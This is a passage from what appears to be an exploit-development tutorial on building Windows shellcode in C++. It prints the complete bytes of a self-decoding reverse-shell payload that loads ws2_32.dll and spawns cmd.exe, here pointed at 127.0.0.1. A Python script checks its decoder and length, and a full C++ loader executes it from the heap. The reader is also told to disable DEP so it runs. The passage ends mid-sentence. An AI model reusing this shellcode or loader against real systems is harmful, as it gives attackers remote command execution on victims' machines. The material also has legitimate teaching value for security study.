"\x5e\x5b\x8b\xe5\x5d\xc3\x8b\x4d\xfc\x8b\x44\x33\x24\x8d\x04\x48"
"\x0f\xb7\x0c\x30\x8b\x44\x33\x1c\x8d\x04\x88\x8b\x04\x30\x03\xc6"
"\xeb\xdd\x2f\x05\x05\x05\xf2\x05\x05\x05\x80\x01\x05\x05\x77\x73"
"\x32\x5f\x33\x32\x2e\x64\x6c\x6c\x05\x63\x6d\x64\x2e\x65\x78\x65"
"\x05\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31\x05";

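The part about relocations is important, because it lets you check that everything is OK. For example, we know that our reverse shell uses 3 strings, and we can see that they were all extracted from the .rdata section. We can also see that the original shellcode was 614 bytes long and that the generated shellcode (after relocations and null bytes have been handled) is 715 bytes long.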
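
The reported final length can also be cross-checked against the shellcode bytes themselves. The Python 3 sketch below copies the first 34 bytes of the listing above, which appear to be the single-block decoder. The instruction boundaries in the comments are my own reading of those bytes, not something the script prints.

```python
import struct

# First 34 bytes of the generated shellcode, copied from the listing above.
DECODER = bytes.fromhex(
    "e8ffffffff"      # CALL $ + 4
    "c0"              # (FF)C0 = INC EAX
    "5f"              # POP EDI
    "b9a8030101"      # MOV ECX, <xor value 1>
    "81f101010101"    # XOR ECX, <xor value 2>
    "83c71d"          # ADD EDI, shellcode_begin - here
    "33f6"            # XOR ESI, ESI
    "fc"              # CLD
    "8a07"            # MOV AL, BYTE PTR [EDI]
    "3c05"            # CMP AL, <missing byte>
    "0f44c6"          # CMOVE EAX, ESI
    "aa"              # STOSB
    "e2f6"            # LOOP back to MOV AL, BYTE PTR [EDI]
)

xor1, = struct.unpack_from("<I", DECODER, 8)    # immediate of MOV ECX
xor2, = struct.unpack_from("<I", DECODER, 14)   # immediate of XOR ECX
payload_len = xor1 ^ xor2                       # bytes processed by the decoder
missing_byte = DECODER[27]                      # value standing in for null bytes

print("decoder length:", len(DECODER))
print("payload length:", payload_len)
print("total length:  ", len(DECODER) + payload_len)
print("missing byte:   0x%02x" % missing_byte)
```

The decoder is 34 bytes long and the two immediates XOR to 681, so the total is 715 bytes, in agreement with the "final shellcode length" line. The missing byte is 0x05, which explains the many `\x05` values in the listing: they stand where the null bytes were.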

Now we need to run the generated shellcode. Here is the complete source code:

#include <cstring>
#include <cassert>
 
// Important: Disable DEP!
//  (Linker->Advanced->Data Execution Prevention = NO)
 
int main() {
    char shellcode[] =
        "\xe8\xff\xff\xff\xff\xc0\x5f\xb9\xa8\x03\x01\x01\x81\xf1\x01\x01"
        "\x01\x01\x83\xc7\x1d\x33\xf6\xfc\x8a\x07\x3c\x05\x0f\x44\xc6\xaa"
        "\xe2\xf6\xe8\x05\x05\x05\x05\x5e\x8b\xfe\x81\xc6\x7b\x02\x05\x05"
        "\xb9\x03\x05\x05\x05\xfc\xad\x01\x3c\x07\xe2\xfa\x55\x8b\xec\x83"
        "\xe4\xf8\x81\xec\x24\x02\x05\x05\x53\x56\x57\xb9\x8d\x10\xb7\xf8"
        "\xe8\xa5\x01\x05\x05\x68\x87\x02\x05\x05\xff\xd0\xb9\x40\xd5\xdc"
        "\x2d\xe8\x94\x01\x05\x05\xb9\x6f\xf1\xd4\x9f\x8b\xf0\xe8\x88\x01"
        "\x05\x05\xb9\x82\xa1\x0d\xa5\x8b\xf8\xe8\x7c\x01\x05\x05\xb9\x70"
        "\xbe\x1c\x23\x89\x44\x24\x18\xe8\x6e\x01\x05\x05\xb9\xd1\xfe\x73"
        "\x1b\x89\x44\x24\x0c\xe8\x60\x01\x05\x05\xb9\xe2\xfa\x1b\x01\xe8"
        "\x56\x01\x05\x05\xb9\xc9\x53\x29\xdc\x89\x44\x24\x20\xe8\x48\x01"
        "\x05\x05\xb9\x6e\x85\x1c\x5c\x89\x44\x24\x1c\xe8\x3a\x01\x05\x05"
        "\xb9\xe0\x53\x31\x4b\x89\x44\x24\x24\xe8\x2c\x01\x05\x05\xb9\x98"
        "\x94\x8e\xca\x8b\xd8\xe8\x20\x01\x05\x05\x89\x44\x24\x10\x8d\x84"
        "\x24\xa0\x05\x05\x05\x50\x68\x02\x02\x05\x05\xff\xd6\x33\xc9\x85"
        "\xc0\x0f\x85\xd8\x05\x05\x05\x51\x51\x51\x6a\x06\x6a\x01\x6a\x02"
        "\x58\x50\xff\xd7\x8b\xf0\x33\xff\x83\xfe\xff\x0f\x84\xc0\x05\x05"
        "\x05\x8d\x44\x24\x14\x50\x57\x57\x68\x9a\x02\x05\x05\xff\x54\x24"
        "\x2c\x85\xc0\x0f\x85\xa8\x05\x05\x05\x6a\x02\x57\x57\x6a\x10\x8d"
        "\x44\x24\x58\x50\x8b\x44\x24\x28\xff\x70\x10\xff\x70\x18\xff\x54"
        "\x24\x40\x6a\x02\x58\x66\x89\x44\x24\x28\xb8\x05\x7b\x05\x05\x66"
        "\x89\x44\x24\x2a\x8d\x44\x24\x48\x50\xff\x54\x24\x24\x57\x57\x57"
        "\x57\x89\x44\x24\x3c\x8d\x44\x24\x38\x6a\x10\x50\x56\xff\x54\x24"
        "\x34\x85\xc0\x75\x5c\x6a\x44\x5f\x8b\xcf\x8d\x44\x24\x58\x33\xd2"
        "\x88\x10\x40\x49\x75\xfa\x8d\x44\x24\x38\x89\x7c\x24\x58\x50\x8d"
        "\x44\x24\x5c\xc7\x84\x24\x88\x05\x05\x05\x05\x01\x05\x05\x50\x52"
        "\x52\x52\x6a\x01\x52\x52\x68\x92\x02\x05\x05\x52\x89\xb4\x24\xc0"
        "\x05\x05\x05\x89\xb4\x24\xbc\x05\x05\x05\x89\xb4\x24\xb8\x05\x05"
        "\x05\xff\x54\x24\x34\x6a\xff\xff\x74\x24\x3c\xff\x54\x24\x18\x33"
        "\xff\x57\xff\xd3\x5f\x5e\x33\xc0\x5b\x8b\xe5\x5d\xc3\x33\xd2\xeb"
        "\x10\xc1\xca\x0d\x3c\x61\x0f\xbe\xc0\x7c\x03\x83\xe8\x20\x03\xd0"
        "\x41\x8a\x01\x84\xc0\x75\xea\x8b\xc2\xc3\x55\x8b\xec\x83\xec\x14"
        "\x53\x56\x57\x89\x4d\xf4\x64\xa1\x30\x05\x05\x05\x89\x45\xfc\x8b"
        "\x45\xfc\x8b\x40\x0c\x8b\x40\x14\x8b\xf8\x89\x45\xec\x8d\x47\xf8"
        "\x8b\x3f\x8b\x70\x18\x85\xf6\x74\x4f\x8b\x46\x3c\x8b\x5c\x30\x78"
        "\x85\xdb\x74\x44\x8b\x4c\x33\x0c\x03\xce\xe8\x9e\xff\xff\xff\x8b"
        "\x4c\x33\x20\x89\x45\xf8\x03\xce\x33\xc0\x89\x4d\xf0\x89\x45\xfc"
        "\x39\x44\x33\x18\x76\x22\x8b\x0c\x81\x03\xce\xe8\x7d\xff\xff\xff"
        "\x03\x45\xf8\x39\x45\xf4\x74\x1e\x8b\x45\xfc\x8b\x4d\xf0\x40\x89"
        "\x45\xfc\x3b\x44\x33\x18\x72\xde\x3b\x7d\xec\x75\xa0\x33\xc0\x5f"
        "\x5e\x5b\x8b\xe5\x5d\xc3\x8b\x4d\xfc\x8b\x44\x33\x24\x8d\x04\x48"
        "\x0f\xb7\x0c\x30\x8b\x44\x33\x1c\x8d\x04\x88\x8b\x04\x30\x03\xc6"
        "\xeb\xdd\x2f\x05\x05\x05\xf2\x05\x05\x05\x80\x01\x05\x05\x77\x73"
        "\x32\x5f\x33\x32\x2e\x64\x6c\x6c\x05\x63\x6d\x64\x2e\x65\x78\x65"
        "\x05\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31\x05";
 
    static_assert(sizeof(shellcode) > 4, "Use 'char shellcode[] = ...' (not 'char *shellcode = ...')");
 
    // We copy the shellcode to the heap so that it's in writeable memory and can modify itself.
    char *ptr = new char[sizeof(shellcode)];
    memcpy(ptr, shellcode, sizeof(shellcode));
    ((void(*)())ptr)();
}

To make this code work, you need to disable DEP (Data Execution Prevention): go to Project→<solution name> Properties, then under Configuration Properties, Linker and Advanced, set Data Execution Prevention (DEP) to No (/NXCOMPAT:NO). This is needed because our shellcode is executed from the heap, which would not be executable with DEP enabled.

static_assert was introduced with C++11 (hence the need for VS 2013 CTP) and is used here to check that you use